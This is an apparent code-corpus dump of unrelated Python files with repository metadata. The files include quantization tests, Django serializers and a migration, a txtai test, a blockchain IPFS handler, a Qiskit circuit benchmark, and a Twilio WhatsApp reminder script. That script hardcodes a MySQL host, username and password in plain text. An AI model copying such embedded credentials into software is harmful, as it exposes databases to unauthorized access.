float_weights = get_layer_weights(getattr(float_model, node.target))
for k, v in quantized_weights.items():
if k in fw_info.kernel_ops_attributes_mapping.get(type(op)):
float_weight = float_weights.get(k)
self.unit_test.assertFalse(float_weight is None)
self.unit_test.assertTrue(np.sum(np.abs(v - float_weight)) > 0.0)
node_next = node.next
while get_node_operation(node_next, quantized_model) == operator.getitem:
node_next = node_next.next
self.unit_test.assertTrue(is_node_fake_quant(node_next))
elif op in PYTORCH_LAYER_TEST_OPS['activation']:
node_next = node.next
while get_node_operation(node_next, quantized_model) == operator.getitem:
node_next = node_next.next
self.unit_test.assertTrue(is_node_fake_quant(node_next))
elif op in PYTORCH_LAYER_TEST_OPS['no_quantization']:
node_next = node.next
while get_node_operation(node_next, quantized_model) == operator.getitem:
node_next = node_next.next
self.unit_test.assertFalse(is_node_fake_quant(node_next))
else:
raise Exception(f'Layer {op} is not in framework info')
def __compare_float_mode(self, float_model, quantized_model, quantized_model_fx):
for node in quantized_model_fx.graph.nodes:
self.unit_test.assertFalse(is_node_fake_quant(node))
if hasattr(quantized_model, str(node.target)):
quantized_weights = get_layer_weights(getattr(quantized_model, node.name))
float_weights = get_layer_weights(getattr(float_model, node.name))
for k, v in quantized_weights.items():
float_weight = float_weights.get(k)
self.unit_test.assertFalse(float_weight is None)
self.unit_test.assertTrue(np.sum(np.abs(v - float_weight)) == 0.0)
input_tensors = self.generate_inputs()
y = float_model(*input_tensors)
y_hat = quantized_model(*input_tensors)
if isinstance(y, (list, tuple)):
for fo, qo in zip(y, y_hat):
distance = torch_tensor_to_numpy(torch.sum(torch.abs(fo - qo)))
self.unit_test.assertTrue(distance == 0,
msg=f'Outputs should be identical. Observed distance: {distance}')
else:
distance = torch_tensor_to_numpy(torch.sum(torch.abs(y - y_hat)))
self.unit_test.assertTrue(distance == 0,
msg=f'Outputs should be identical. Observed distance: {distance}')
| true | true |
f722ef5194b3bd55287cc22de9904dd969534850 | 1,056 | py | Python | zoo_app/serializers.py | sh4rpy/zoo_api | 77c2788141fb6f25f8e5d1de7137653a153d7c3d | [
"BSD-3-Clause"
] | null | null | null | zoo_app/serializers.py | sh4rpy/zoo_api | 77c2788141fb6f25f8e5d1de7137653a153d7c3d | [
"BSD-3-Clause"
] | null | null | null | zoo_app/serializers.py | sh4rpy/zoo_api | 77c2788141fb6f25f8e5d1de7137653a153d7c3d | [
"BSD-3-Clause"
] | null | null | null | from rest_framework import serializers
from .models import Employee, ZooPlace, AnimalType, Animal
class EmployeeSerializer(serializers.ModelSerializer):
class Meta:
model = Employee
fields = '__all__'
class ZooPlaceSerializer(serializers.ModelSerializer):
animal_count = serializers.ReadOnlyField(source='animals.count')
class Meta:
model = ZooPlace
fields = '__all__'
class AnimalTypeSerializer(serializers.ModelSerializer):
class Meta:
model = AnimalType
fields = '__all__'
class AnimalSerializer(serializers.ModelSerializer):
type = serializers.SlugRelatedField(slug_field='name', queryset=AnimalType.objects.all())
place = serializers.SlugRelatedField(slug_field='name', queryset=ZooPlace.objects.all())
# для удобства чтения добавлено поле с полным именем закрепленного сотрудника
responsible_employee_full_name = serializers.ReadOnlyField(source='responsible_employee.get_employee_full_name')
class Meta:
model = Animal
fields = '__all__'
| 30.171429 | 116 | 0.744318 | from rest_framework import serializers
from .models import Employee, ZooPlace, AnimalType, Animal
class EmployeeSerializer(serializers.ModelSerializer):
class Meta:
model = Employee
fields = '__all__'
class ZooPlaceSerializer(serializers.ModelSerializer):
animal_count = serializers.ReadOnlyField(source='animals.count')
class Meta:
model = ZooPlace
fields = '__all__'
class AnimalTypeSerializer(serializers.ModelSerializer):
class Meta:
model = AnimalType
fields = '__all__'
class AnimalSerializer(serializers.ModelSerializer):
type = serializers.SlugRelatedField(slug_field='name', queryset=AnimalType.objects.all())
place = serializers.SlugRelatedField(slug_field='name', queryset=ZooPlace.objects.all())
responsible_employee_full_name = serializers.ReadOnlyField(source='responsible_employee.get_employee_full_name')
class Meta:
model = Animal
fields = '__all__'
| true | true |
f722f040f81bc0fb6a9bae04a6e256d003b49696 | 1,509 | py | Python | test/python/testpipeline/testentity.py | malywonsz/txtai | ace1b04161062430887eb2153961abcd819a5afb | [
"Apache-2.0"
] | 1 | 2020-09-18T14:11:34.000Z | 2020-09-18T14:11:34.000Z | test/python/testpipeline/testentity.py | aria1991/txtai | fa342a4f6a69fb1e2cea0e85e39915f055ee8503 | [
"Apache-2.0"
] | 47 | 2021-10-02T22:48:03.000Z | 2021-12-29T02:36:20.000Z | test/python/testpipeline/testentity.py | aria1991/txtai | fa342a4f6a69fb1e2cea0e85e39915f055ee8503 | [
"Apache-2.0"
] | null | null | null | """
Entity module tests
"""
import unittest
from txtai.pipeline import Entity
class TestEntity(unittest.TestCase):
"""
Entity tests.
"""
@classmethod
def setUpClass(cls):
"""
Create entity instance.
"""
cls.entity = Entity("dslim/bert-base-NER")
def testEntity(self):
"""
Test entity
"""
# Run entity extraction
entities = self.entity("Canada's last fully intact ice shelf has suddenly collapsed, forming a Manhattan-sized iceberg")
self.assertEqual([e[0] for e in entities], ["Canada", "Manhattan"])
def testEntityFlatten(self):
"""
Test entity with flattened output
"""
# Test flatten
entities = self.entity("Canada's last fully intact ice shelf has suddenly collapsed, forming a Manhattan-sized iceberg", flatten=True)
self.assertEqual(entities, ["Canada", "Manhattan"])
# Test flatten with join
entities = self.entity(
"Canada's last fully intact ice shelf has suddenly collapsed, forming a Manhattan-sized iceberg", flatten=True, join=True
)
self.assertEqual(entities, "Canada Manhattan")
def testEntityTypes(self):
"""
Test entity type filtering
"""
# Run entity extraction
entities = self.entity("Canada's last fully intact ice shelf has suddenly collapsed, forming a Manhattan-sized iceberg", labels=["PER"])
self.assertFalse(entities)
| 27.436364 | 144 | 0.626243 |
import unittest
from txtai.pipeline import Entity
class TestEntity(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.entity = Entity("dslim/bert-base-NER")
def testEntity(self):
entities = self.entity("Canada's last fully intact ice shelf has suddenly collapsed, forming a Manhattan-sized iceberg")
self.assertEqual([e[0] for e in entities], ["Canada", "Manhattan"])
def testEntityFlatten(self):
# Test flatten
entities = self.entity("Canada's last fully intact ice shelf has suddenly collapsed, forming a Manhattan-sized iceberg", flatten=True)
self.assertEqual(entities, ["Canada", "Manhattan"])
entities = self.entity(
"Canada's last fully intact ice shelf has suddenly collapsed, forming a Manhattan-sized iceberg", flatten=True, join=True
)
self.assertEqual(entities, "Canada Manhattan")
def testEntityTypes(self):
# Run entity extraction
entities = self.entity("Canada's last fully intact ice shelf has suddenly collapsed, forming a Manhattan-sized iceberg", labels=["PER"])
self.assertFalse(entities)
| true | true |
f722f0934122b5e398fdeb44779b23cdbd091cd8 | 564 | py | Python | steps/migrations/0006_auto_20170827_2213.py | arusyonok/speakup | 8094ce1d6c7e122ec0de82b3a4daeda7ac2a4f41 | [
"Apache-2.0"
] | null | null | null | steps/migrations/0006_auto_20170827_2213.py | arusyonok/speakup | 8094ce1d6c7e122ec0de82b3a4daeda7ac2a4f41 | [
"Apache-2.0"
] | null | null | null | steps/migrations/0006_auto_20170827_2213.py | arusyonok/speakup | 8094ce1d6c7e122ec0de82b3a4daeda7ac2a4f41 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-08-27 19:13
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('steps', '0005_auto_20170827_1925'),
]
operations = [
migrations.AlterField(
model_name='exercise',
name='question_id',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='steps.Question'),
),
]
| 25.636364 | 125 | 0.656028 |
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('steps', '0005_auto_20170827_1925'),
]
operations = [
migrations.AlterField(
model_name='exercise',
name='question_id',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='steps.Question'),
),
]
| true | true |
f722f0fc36b243187aa8d44062fc7d80514e6c8e | 1,892 | py | Python | src/command_modules/azure-cli-keyvault/setup.py | enterstudio/azure-cli | b0504c3b634e17f1afc944a9572864a40da6bc18 | [
"MIT"
] | null | null | null | src/command_modules/azure-cli-keyvault/setup.py | enterstudio/azure-cli | b0504c3b634e17f1afc944a9572864a40da6bc18 | [
"MIT"
] | null | null | null | src/command_modules/azure-cli-keyvault/setup.py | enterstudio/azure-cli | b0504c3b634e17f1afc944a9572864a40da6bc18 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from codecs import open
from setuptools import setup
VERSION = '0.1.1b3+dev'
# The full list of classifiers is available at
# https://pypi.python.org/pypi?%3Aaction=list_classifiers
CLASSIFIERS = [
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'License :: OSI Approved :: MIT License',
]
DEPENDENCIES = [
'azure-mgmt-keyvault==0.30.0',
'azure-keyvault==0.1.0',
'azure-cli-core',
'pyOpenSSL'
]
with open('README.rst', 'r', encoding='utf-8') as f:
README = f.read()
with open('HISTORY.rst', 'r', encoding='utf-8') as f:
HISTORY = f.read()
setup(
name='azure-cli-keyvault',
version=VERSION,
description='Microsoft Azure Command-Line Tools Keyvault Command Module',
long_description=README + '\n\n' + HISTORY,
license='MIT',
author='Microsoft Corporation',
author_email='azpycli@microsoft.com',
url='https://github.com/Azure/azure-cli',
classifiers=CLASSIFIERS,
namespace_packages=[
'azure',
'azure.cli',
'azure.cli.command_modules'
],
packages=[
'azure.cli.command_modules.keyvault'
],
install_requires=DEPENDENCIES,
)
| 30.516129 | 94 | 0.592495 |
from codecs import open
from setuptools import setup
VERSION = '0.1.1b3+dev'
CLASSIFIERS = [
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'License :: OSI Approved :: MIT License',
]
DEPENDENCIES = [
'azure-mgmt-keyvault==0.30.0',
'azure-keyvault==0.1.0',
'azure-cli-core',
'pyOpenSSL'
]
with open('README.rst', 'r', encoding='utf-8') as f:
README = f.read()
with open('HISTORY.rst', 'r', encoding='utf-8') as f:
HISTORY = f.read()
setup(
name='azure-cli-keyvault',
version=VERSION,
description='Microsoft Azure Command-Line Tools Keyvault Command Module',
long_description=README + '\n\n' + HISTORY,
license='MIT',
author='Microsoft Corporation',
author_email='azpycli@microsoft.com',
url='https://github.com/Azure/azure-cli',
classifiers=CLASSIFIERS,
namespace_packages=[
'azure',
'azure.cli',
'azure.cli.command_modules'
],
packages=[
'azure.cli.command_modules.keyvault'
],
install_requires=DEPENDENCIES,
)
| true | true |
f722f183360b21031a113892752701feb5e37dee | 2,189 | py | Python | src/protocol/on_chain_info_request.py | hvuhsg/yoyocoin | aad0f413479728dc4e0842447cf1910e5dff1418 | [
"MIT"
] | 11 | 2021-05-25T07:42:27.000Z | 2022-01-03T07:46:38.000Z | src/protocol/on_chain_info_request.py | hvuhsg/yoyocoin | aad0f413479728dc4e0842447cf1910e5dff1418 | [
"MIT"
] | 18 | 2021-05-25T17:42:46.000Z | 2021-09-13T15:14:38.000Z | src/protocol/on_chain_info_request.py | hvuhsg/yoyocoin | aad0f413479728dc4e0842447cf1910e5dff1418 | [
"MIT"
] | 5 | 2021-06-23T17:38:51.000Z | 2022-03-03T12:40:53.000Z | """
Handle chain info request
if chain info request is initiated the handler will execute those steps:
1. validate message
2. get chain info and summery
3. publish chain info and get cid
4. send the cid and summery
"""
from typing import Tuple
from blockchain import Blockchain
from network.ipfs import Node, Message
from .handler import Handler
class ChainInfoRequestHandler(Handler):
topic = "chain-request"
topic_response = "chain-response"
def __init__(self):
self.node = Node.get_instance()
def validate(self, message: Message):
blockchain: Blockchain = Blockchain.get_main_chain()
score_exist = message.meta.get("score", None) is not None
score_is_lower = score_exist and message.meta.get("score") < blockchain.score
# TODO: check length
return score_is_lower
def get_chain_info(self) -> Tuple[dict, dict]:
"""
Return blockchain block hashes
:return: tuple of chain info (block hashes) and chain summery (chain length and score)
"""
blockchain: Blockchain = Blockchain.get_main_chain()
blocks = blockchain.chain
score = blockchain.score
length = blockchain.length
return {"blocks": blocks}, {"score": score, "length": length}
def publish_chain_info(self, chain_info: dict) -> str:
blocks_cids = []
blocks_hashes = []
for block in chain_info["blocks"]:
block_dict = block.to_dict()
blocks_cids.append(self.node.create_cid(block_dict))
blocks_hashes.append(block.hash())
return self.node.create_cid(
{"blocks_cid": blocks_cids, "blocks_hash": blocks_hashes}
)
def send_cid_and_summery(self, cid: str, summery: dict):
return self.node.publish_to_topic(
topic=self.topic_response, message=Message(cid=cid, meta=summery)
)
def __call__(self, message: Message):
super().log(message)
if not self.validate(message):
return
chain_info, chain_summery = self.get_chain_info()
cid = self.publish_chain_info(chain_info)
self.send_cid_and_summery(cid, chain_summery)
| 33.676923 | 94 | 0.664687 | from typing import Tuple
from blockchain import Blockchain
from network.ipfs import Node, Message
from .handler import Handler
class ChainInfoRequestHandler(Handler):
topic = "chain-request"
topic_response = "chain-response"
def __init__(self):
self.node = Node.get_instance()
def validate(self, message: Message):
blockchain: Blockchain = Blockchain.get_main_chain()
score_exist = message.meta.get("score", None) is not None
score_is_lower = score_exist and message.meta.get("score") < blockchain.score
return score_is_lower
def get_chain_info(self) -> Tuple[dict, dict]:
blockchain: Blockchain = Blockchain.get_main_chain()
blocks = blockchain.chain
score = blockchain.score
length = blockchain.length
return {"blocks": blocks}, {"score": score, "length": length}
def publish_chain_info(self, chain_info: dict) -> str:
blocks_cids = []
blocks_hashes = []
for block in chain_info["blocks"]:
block_dict = block.to_dict()
blocks_cids.append(self.node.create_cid(block_dict))
blocks_hashes.append(block.hash())
return self.node.create_cid(
{"blocks_cid": blocks_cids, "blocks_hash": blocks_hashes}
)
def send_cid_and_summery(self, cid: str, summery: dict):
return self.node.publish_to_topic(
topic=self.topic_response, message=Message(cid=cid, meta=summery)
)
def __call__(self, message: Message):
super().log(message)
if not self.validate(message):
return
chain_info, chain_summery = self.get_chain_info()
cid = self.publish_chain_info(chain_info)
self.send_cid_and_summery(cid, chain_summery)
| true | true |
f722f1fd3b4d30624e6d89fa16d82222e5c6995c | 2,500 | py | Python | whatsapp_alex.py | Tycho-02/studentmotivator-inator | 6c50d79127cca1a88bf2f2df58a0f451f41abe9d | [
"MIT"
] | 1 | 2021-03-17T13:09:15.000Z | 2021-03-17T13:09:15.000Z | whatsapp_alex.py | Tycho-02/studentmotivator-inator | 6c50d79127cca1a88bf2f2df58a0f451f41abe9d | [
"MIT"
] | null | null | null | whatsapp_alex.py | Tycho-02/studentmotivator-inator | 6c50d79127cca1a88bf2f2df58a0f451f41abe9d | [
"MIT"
] | null | null | null | #ontwikkeld door S1118551
#We sturen in deze file een whatsapp bericht naar gebruiker wanner die wakker is geworden met de taken die hem te wachten staan op deze dag.
#mocht de gebruiker geen taak hebben op die dag, dan krijgt die een melding dat die goed bezig was de afgelopen dag
#Dit is een koppeling met subsysteem van Tycho!
import os
from twilio.rest import Client
import mysql.connector
mydb = mysql.connector.connect(
host="vserver385.axc.nl",
user="tychogp385_ipmedt5",
passwd="ipmedt5",
database="tychogp385_ipmedt5"
)
#taken ophalen
taken = []
mycursor = mydb.cursor()
sql_select_Query = "select title, omschrijving from taken where uitvoerdatum = curdate() and status = 'niet voltooid'" #we gaan een bericht sturen naar de gebruiker met taken die hij op die dag moet uitvoeren
mycursor.execute(sql_select_Query)
records = mycursor.fetchall()
for row in records:
taken.append(row[1])
takenOpen = ',\n'.join(taken) #we zetten list om in een string vol met omschrijving van de taken op die dag
#gegevens ophalen
gegevens = []
sql_select_Query1 = "select name, telefoonnummer from users where userId = 1" #user gegevens ophalen
mycursor.execute(sql_select_Query1)
records = mycursor.fetchall()
for user in records:
gegevens.append(user[0])
gegevens.append(user[1])
naam = gegevens[0]
nummer = '+31' + str(gegevens[1])
print('taken')
print('naam is ' + naam)
print('nummer is ' + nummer)
account_sid = '' #We moeten dit prive houden in github vanwege security issues
auth_token = '' #We moeten dit prive houden in github vanwege security issu
client = Client(account_sid, auth_token)
##WAARSCHUWING
#gebruiker moet eerst bericht op whatsapp 'join above-noon' sturen naar nummer +14155238886 om berichten te kunnen ontvangen, omdat we gebruik maken van een sandbox:
##
from_whatsapp_number='whatsapp:+14155238886'
to_whatsapp_number = 'whatsapp:' + nummer
if(taken > 0): #als gebruiker taken op die dag heeft staan
client.messages.create(body='Beste ' + naam + ',\nvandaag heb je op planning de volgende taak/taken staan:\n' + takenOpen + '.\nVeel succes en zet hem op!', from_=from_whatsapp_number,to=to_whatsapp_number)
else: #anders sturen we gebruiker een leuk bericht met dat die de afgelopen weken goed is bezig geweest
client.messages.create(body='Beste ' + naam + ',\nvandaag heb je geen taak/taken open staan. Je bent goed bezig geweest de afgelopen dagen, ga zo door!', from_=from_whatsapp_number,to=to_whatsapp_number)
| 37.878788 | 210 | 0.7568 |
import os
from twilio.rest import Client
import mysql.connector
mydb = mysql.connector.connect(
host="vserver385.axc.nl",
user="tychogp385_ipmedt5",
passwd="ipmedt5",
database="tychogp385_ipmedt5"
)
taken = []
mycursor = mydb.cursor()
sql_select_Query = "select title, omschrijving from taken where uitvoerdatum = curdate() and status = 'niet voltooid'"
mycursor.execute(sql_select_Query)
records = mycursor.fetchall()
for row in records:
taken.append(row[1])
takenOpen = ',\n'.join(taken)
gegevens = []
sql_select_Query1 = "select name, telefoonnummer from users where userId = 1"
mycursor.execute(sql_select_Query1)
records = mycursor.fetchall()
for user in records:
gegevens.append(user[0])
gegevens.append(user[1])
naam = gegevens[0]
nummer = '+31' + str(gegevens[1])
print('taken')
print('naam is ' + naam)
print('nummer is ' + nummer)
account_sid = ''
auth_token = ''
client = Client(account_sid, auth_token)
sapp_number='whatsapp:+14155238886'
to_whatsapp_number = 'whatsapp:' + nummer
if(taken > 0):
client.messages.create(body='Beste ' + naam + ',\nvandaag heb je op planning de volgende taak/taken staan:\n' + takenOpen + '.\nVeel succes en zet hem op!', from_=from_whatsapp_number,to=to_whatsapp_number)
else:
client.messages.create(body='Beste ' + naam + ',\nvandaag heb je geen taak/taken open staan. Je bent goed bezig geweest de afgelopen dagen, ga zo door!', from_=from_whatsapp_number,to=to_whatsapp_number)
| true | true |
f722f3e0a4d7b7f162d149e2b77f4d6ca1bb7d1c | 347 | py | Python | pythonFiles/tests/run_all.py | alexvy86/vscode-python | de625369b59ff3928859cd6beec0cb296eab493c | [
"MIT"
] | null | null | null | pythonFiles/tests/run_all.py | alexvy86/vscode-python | de625369b59ff3928859cd6beec0cb296eab493c | [
"MIT"
] | null | null | null | pythonFiles/tests/run_all.py | alexvy86/vscode-python | de625369b59ff3928859cd6beec0cb296eab493c | [
"MIT"
] | null | null | null | import os.path
import sys
import pytest
TEST_ROOT = os.path.dirname(__file__)
SRC_ROOT = os.path.dirname(TEST_ROOT)
DATASCIENCE_ROOT = os.path.join(SRC_ROOT, 'datascience')
if __name__ == '__main__':
sys.path.insert(1, DATASCIENCE_ROOT)
ec = pytest.main([
'--rootdir', SRC_ROOT,
TEST_ROOT,
])
sys.exit(ec)
| 18.263158 | 56 | 0.665706 | import os.path
import sys
import pytest
TEST_ROOT = os.path.dirname(__file__)
SRC_ROOT = os.path.dirname(TEST_ROOT)
DATASCIENCE_ROOT = os.path.join(SRC_ROOT, 'datascience')
if __name__ == '__main__':
sys.path.insert(1, DATASCIENCE_ROOT)
ec = pytest.main([
'--rootdir', SRC_ROOT,
TEST_ROOT,
])
sys.exit(ec)
| true | true |
f722f45b5c1cb9a003331a5fca823ab307245999 | 456 | py | Python | data/scripts/templates/object/static/space/debris/shared_cargo_destroyed_large_a.py | obi-two/GameServer | 7d37024e2291a97d49522610cd8f1dbe5666afc2 | [
"MIT"
] | 20 | 2015-02-23T15:11:56.000Z | 2022-03-18T20:56:48.000Z | data/scripts/templates/object/static/space/debris/shared_cargo_destroyed_large_a.py | apathyboy/swganh | 665128efe9154611dec4cb5efc61d246dd095984 | [
"MIT"
] | null | null | null | data/scripts/templates/object/static/space/debris/shared_cargo_destroyed_large_a.py | apathyboy/swganh | 665128efe9154611dec4cb5efc61d246dd095984 | [
"MIT"
] | 20 | 2015-04-04T16:35:59.000Z | 2022-03-24T14:54:37.000Z | #### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Static()
result.template = "object/static/space/debris/shared_cargo_destroyed_large_a.iff"
result.attribute_template_id = -1
result.stfName("obj_n","unknown_object")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result | 26.823529 | 82 | 0.730263 | true | true | |
f722f6308a91977c4089757947509ab92b935a5f | 138 | py | Python | trace.py | jvicu2001/GGeoTrace | 7796daaa505586cf7b867e321aa528f5dd64a8c6 | [
"MIT"
] | null | null | null | trace.py | jvicu2001/GGeoTrace | 7796daaa505586cf7b867e321aa528f5dd64a8c6 | [
"MIT"
] | null | null | null | trace.py | jvicu2001/GGeoTrace | 7796daaa505586cf7b867e321aa528f5dd64a8c6 | [
"MIT"
] | null | null | null | import socket
"""
TODO
Custom implementation of traceroute
It will only return data needed for the rest of the program (ip and time)
""" | 17.25 | 73 | 0.76087 | import socket
| true | true |
f722f672f7f943a9cc28fff66f5c11bb56a0d78c | 4,146 | py | Python | benchmark/startQiskit_Class2285.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | benchmark/startQiskit_Class2285.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | benchmark/startQiskit_Class2285.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | # qubit number=4
# total number=39
import cirq
import qiskit
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2
import numpy as np
import networkx as nx
def bitwise_xor(s: str, t: str) -> str:
length = len(s)
res = []
for i in range(length):
res.append(str(int(s[i]) ^ int(t[i])))
return ''.join(res[::-1])
def bitwise_dot(s: str, t: str) -> str:
length = len(s)
res = 0
for i in range(length):
res += int(s[i]) * int(t[i])
return str(res % 2)
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f
# NOTE: use multi_control_toffoli_gate ('noancilla' mode)
# https://qiskit.org/documentation/_modules/qiskit/aqua/circuits/gates/multi_control_toffoli_gate.html
# https://quantumcomputing.stackexchange.com/questions/3943/how-do-you-implement-the-toffoli-gate-using-only-single-qubit-and-cnot-gates
# https://quantumcomputing.stackexchange.com/questions/2177/how-can-i-implement-an-n-bit-toffoli-gate
controls = QuantumRegister(n, "ofc")
target = QuantumRegister(1, "oft")
oracle = QuantumCircuit(controls, target, name="Of")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
oracle.mct(controls, target[0], None, mode='noancilla')
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[3]) # number=36
prog.cz(input_qubit[0],input_qubit[3]) # number=37
prog.h(input_qubit[3]) # number=38
prog.h(input_qubit[3]) # number=23
prog.cz(input_qubit[0],input_qubit[3]) # number=24
prog.h(input_qubit[3]) # number=25
prog.x(input_qubit[3]) # number=18
prog.cx(input_qubit[0],input_qubit[3]) # number=19
prog.cx(input_qubit[0],input_qubit[3]) # number=15
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=3
prog.h(input_qubit[3]) # number=4
prog.y(input_qubit[3]) # number=12
prog.h(input_qubit[0]) # number=5
oracle = build_oracle(n-1, f)
prog.append(oracle.to_gate(),[input_qubit[i] for i in range(n-1)]+[input_qubit[n-1]])
prog.h(input_qubit[1]) # number=6
prog.h(input_qubit[2]) # number=7
prog.h(input_qubit[3]) # number=32
prog.cx(input_qubit[3],input_qubit[0]) # number=20
prog.cx(input_qubit[3],input_qubit[0]) # number=26
prog.z(input_qubit[3]) # number=27
prog.h(input_qubit[0]) # number=29
prog.cz(input_qubit[3],input_qubit[0]) # number=30
prog.h(input_qubit[0]) # number=31
prog.h(input_qubit[0]) # number=33
prog.cz(input_qubit[3],input_qubit[0]) # number=34
prog.h(input_qubit[0]) # number=35
prog.h(input_qubit[3]) # number=8
prog.h(input_qubit[0]) # number=9
prog.y(input_qubit[2]) # number=10
prog.y(input_qubit[2]) # number=11
# circuit end
return prog
if __name__ == '__main__':
a = "111"
b = "0"
f = lambda rep: bitwise_xor(bitwise_dot(a, rep), b)
prog = make_circuit(4,f)
backend = BasicAer.get_backend('statevector_simulator')
sample_shot =8000
info = execute(prog, backend=backend).result().get_statevector()
qubits = round(log2(len(info)))
info = {
np.binary_repr(i, qubits): round((info[i]*(info[i].conjugate())).real,3)
for i in range(2 ** qubits)
}
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit_Class2285.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.__len__(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
| 34.264463 | 140 | 0.646165 |
import cirq
import qiskit
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2
import numpy as np
import networkx as nx
def bitwise_xor(s: str, t: str) -> str:
length = len(s)
res = []
for i in range(length):
res.append(str(int(s[i]) ^ int(t[i])))
return ''.join(res[::-1])
def bitwise_dot(s: str, t: str) -> str:
length = len(s)
res = 0
for i in range(length):
res += int(s[i]) * int(t[i])
return str(res % 2)
def build_oracle(n: int, f) -> QuantumCircuit:
controls = QuantumRegister(n, "ofc")
target = QuantumRegister(1, "oft")
oracle = QuantumCircuit(controls, target, name="Of")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
oracle.mct(controls, target[0], None, mode='noancilla')
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[3])
prog.cz(input_qubit[0],input_qubit[3])
prog.h(input_qubit[3])
prog.h(input_qubit[3])
prog.cz(input_qubit[0],input_qubit[3])
prog.h(input_qubit[3])
prog.x(input_qubit[3])
prog.cx(input_qubit[0],input_qubit[3])
prog.cx(input_qubit[0],input_qubit[3])
prog.h(input_qubit[1])
prog.h(input_qubit[2])
prog.h(input_qubit[3])
prog.y(input_qubit[3])
prog.h(input_qubit[0])
oracle = build_oracle(n-1, f)
prog.append(oracle.to_gate(),[input_qubit[i] for i in range(n-1)]+[input_qubit[n-1]])
prog.h(input_qubit[1])
prog.h(input_qubit[2])
prog.h(input_qubit[3])
prog.cx(input_qubit[3],input_qubit[0])
prog.cx(input_qubit[3],input_qubit[0])
prog.z(input_qubit[3])
prog.h(input_qubit[0])
prog.cz(input_qubit[3],input_qubit[0])
prog.h(input_qubit[0])
prog.h(input_qubit[0])
prog.cz(input_qubit[3],input_qubit[0])
prog.h(input_qubit[0])
prog.h(input_qubit[3])
prog.h(input_qubit[0])
prog.y(input_qubit[2])
prog.y(input_qubit[2])
return prog
if __name__ == '__main__':
a = "111"
b = "0"
f = lambda rep: bitwise_xor(bitwise_dot(a, rep), b)
prog = make_circuit(4,f)
backend = BasicAer.get_backend('statevector_simulator')
sample_shot =8000
info = execute(prog, backend=backend).result().get_statevector()
qubits = round(log2(len(info)))
info = {
np.binary_repr(i, qubits): round((info[i]*(info[i].conjugate())).real,3)
for i in range(2 ** qubits)
}
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit_Class2285.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.__len__(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
| true | true |
f722f68671210fad50d8f791d2f07c23952265c7 | 3,483 | py | Python | coveragecalc/fields.py | myu-wp/coveragecalc | e2fac3baba3f240c8d776f7d28331899333a05c2 | [
"MIT"
] | null | null | null | coveragecalc/fields.py | myu-wp/coveragecalc | e2fac3baba3f240c8d776f7d28331899333a05c2 | [
"MIT"
] | 2 | 2017-12-01T22:28:15.000Z | 2017-12-11T17:10:31.000Z | coveragecalc/fields.py | myu-wp/coveragecalc | e2fac3baba3f240c8d776f7d28331899333a05c2 | [
"MIT"
] | null | null | null | import numpy as np
OUTPUTS = [
'primary phone is valid',
'primary phone to name',
'primary phone to address',
'primary phone line type',
'primary phone is prepaid',
